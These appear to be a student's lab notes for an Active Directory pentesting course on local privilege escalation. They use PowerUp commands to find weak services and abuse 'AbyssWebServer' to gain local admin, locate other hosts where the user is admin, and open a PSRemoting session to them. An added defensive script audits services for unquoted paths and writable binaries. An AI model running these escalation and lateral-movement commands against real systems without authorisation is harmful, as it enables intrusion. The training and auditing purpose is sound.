Obj 5 Local Priv Esc
Task - Elevate local privileges on studentvm and identify where we have local admin access.
We will be using PowerUp.ps1 for this objective.
Find Unquoted service paths
Get-ServiceUnquoted
Find service files we can modify
Get-ModifiableServiceFile -Verbose
Find services we can modify
Get-ModifiableService
Abuse a service we found to be modifiable
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\studentx'
Once we abuse this service, we need to log off and back on for the escalation to take effect, because group membership is only picked up in the access token at logon.
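An administrator's audit for the first two findings above (unquoted service paths and service binaries writable by broad groups), as an added example that is not part of the original notes or of PowerUp. The list of broad principals and the function names Get-ServiceBinaryPath, Test-UnquotedServicePath and Get-WeakServiceFinding are assumptions made for illustration; service DACLs (the third check) are not covered.

```powershell
# Added example (not from the original notes): audit services for unquoted
# paths and for binaries writable by broad groups. Run elevated.
# Assumed list of principals that should never hold write rights on a service binary.
$broad = 'Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE'
# Write-type bits only; Modify/FullControl are not used as masks because they include read bits.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, ChangePermissions, TakeOwnership'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    $p = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($p -match '^\s*"([^"]+)"')    { return $Matches[1] }   # quoted: "C:\a b\svc.exe" -arg
    if ($p -match '^\s*(.+?\.exe)\b') { return $Matches[1] }   # unquoted: up to the first .exe
    return $null
}

function Test-UnquotedServicePath {
    param([string]$PathName)
    $exe = Get-ServiceBinaryPath $PathName
    # Only a finding when the path is unquoted and the executable path contains a space.
    return (($PathName -notmatch '^\s*"') -and ($null -ne $exe) -and ($exe -match '\s'))
}

function Get-WeakServiceFinding {
    Get-CimInstance -ClassName Win32_Service | Where-Object PathName | ForEach-Object {
        $exe  = Get-ServiceBinaryPath $_.PathName
        $weak = @()
        if ($exe -and (Test-Path -LiteralPath $exe)) {
            # Allow ACEs that grant a write-type right to one of the broad principals
            $weak = @((Get-Acl -LiteralPath $exe).Access | Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                $broad -contains $_.IdentityReference.Value -and
                (([int]$_.FileSystemRights -band $writeMask) -ne 0)
            })
        }
        $unquoted = Test-UnquotedServicePath $_.PathName
        if ($unquoted -or $weak.Count -gt 0) {
            [pscustomobject]@{
                Service    = $_.Name
                RunsAs     = $_.StartName
                Unquoted   = $unquoted
                WritableBy = ($weak | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique) -join ', '
                PathName   = $_.PathName
            }
        }
    }
}

Get-WeakServiceFinding | Format-Table -AutoSize -Wrap
```

Each row is a service to fix: quote the ImagePath, or remove the write ACE from the binary.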
Find where we have local admin access
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
We can now use winrs or PSRemoting to access any machines listed by the command above.
PSRemote into another machine as local admin
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
Jenkins....
Coming soon...